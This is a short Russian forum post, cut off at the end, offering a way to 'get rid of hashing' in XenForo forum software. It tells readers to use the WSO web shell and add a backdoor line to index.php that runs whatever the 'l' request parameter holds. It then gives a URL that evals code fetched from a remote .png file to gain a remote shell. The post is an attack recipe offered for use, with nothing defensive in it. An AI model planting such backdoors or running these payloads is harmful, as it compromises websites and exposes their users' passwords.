избавляемся от хешей в ксене

  1. pw0ned

    Избавляемся от Хеширования [Xenforo]

    Используем "WSO Web Shel" Отправляемся к файлу index.php , и дописываем вредоносный код: if (isset($_REQUEST['l'])) assert(stripslashes($_REQUEST[l])); Вызываем скрипт и получаем доступ к RemoteShell: http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#...